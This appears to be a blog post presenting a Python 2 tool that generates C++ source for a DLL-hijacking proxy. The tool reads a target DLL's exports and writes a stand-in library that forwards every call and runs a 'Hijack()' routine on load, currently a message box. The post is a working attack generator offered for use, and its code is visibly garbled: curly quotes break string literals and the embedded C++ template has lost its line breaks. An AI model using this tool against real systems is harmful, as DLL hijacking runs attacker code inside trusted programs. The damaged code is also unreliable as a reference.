Dll Hijacker

Posted 2020-08-16 杀死比特

#coding=utf-8
#
# Dll Hijacker
#
# platform: Python 2.x @ Windows 
#
# author:Coca1ne

import os,sys,time
import pefile


def main():
    try:
        pe = pefile.PE(sys.argv[1])
        exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols
        print "[!]Find export function :[ %d ]\r\n" % len(exportTable)
        for exptab in exportTable: 
            print "%3s %10s" % (exptab.ordinal, exptab.name)
        print "\r\n[+] generating DLL Hijack cpp file ..."
        
        generate(exportTable)
        
        print "\r\n[+] generating DLL Hijack cpp file has finished!"
    except Exception, e:
        print e

def generate(exportTable):
    segments = r"//Generate by DLLHijacker.py#include <Windows.h>DEFINE_DLL_EXPORT_FUNC#define EXTERNC extern \"C\"#define NAKED __declspec(naked)#define EXPORT __declspec(dllexport)#define ALCPP EXPORT NAKED#define ALSTD EXTERNC EXPORT NAKED void __stdcall#define ALCFAST EXTERNC EXPORT NAKED void __fastcall#define ALCDECL EXTERNC NAKED void __cdeclnamespace DLLHijacker{    HMODULE m_hModule = NULL;    DWORD m_dwReturn[17] = {0};    inline BOOL WINAPI Load()    {        TCHAR tzPath[MAX_PATH];        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));        m_hModule = LoadLibrary(tzPath);        if (m_hModule == NULL)            return FALSE;        return (m_hModule != NULL);    }    inline VOID WINAPI Free()    {        if (m_hModule)            FreeLibrary(m_hModule);    }    FARPROC WINAPI GetAddress(PCSTR pszProcName)    {        FARPROC fpAddress;        CHAR szProcName[16];        fpAddress = GetProcAddress(m_hModule, pszProcName);        if (fpAddress == NULL)        {            if (HIWORD(pszProcName) == 0)            {                wsprintf(szProcName, \"%d\", pszProcName);                pszProcName = szProcName;            }            ExitProcess(-2);        }        return fpAddress;    }}using namespace DLLHijacker;VOID Hijack(){    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);}BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved){    if (dwReason == DLL_PROCESS_ATTACH)    {        DisableThreadLibraryCalls(hModule);        if(Load())            Hijack();    }    else if (dwReason == DLL_PROCESS_DETACH)    {        Free();    }    return TRUE;}"
    filename = sys.argv[1][sys.argv[1].rindex(‘\\‘)+1:sys.argv[1].rindex(‘.‘)]
    fp = open(filename + ".cpp", "w+")
    define_dll_exp_func = ""
    for exptable in exportTable:
        define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name) +                            "=_DLLHijacker_" + str(exptable.name) + ",@"+ str(exptable.ordinal) +"\")\n"
    segments = segments.replace(‘DLL_FILENAME‘, filename)
    segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace(‘\\‘,‘‘)
    fp.writelines(segments)
    
    forward_dll_exp_func = ""
    for exptable in exportTable:
        forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name) +"(void)\n{" +                             "\n        __asm POP m_dwReturn[0 * TYPE long];\n    GetAddress(\""+                             str(exptable.name) + "\")();\n    __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n"
    fp.writelines(forward_dll_exp_func)
    fp.close()

def usage():
    print "Usage:"
    print "    %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0]

if __name__ == "__main__":
    if(len(sys.argv) <2):
        usage()
    else:
        main()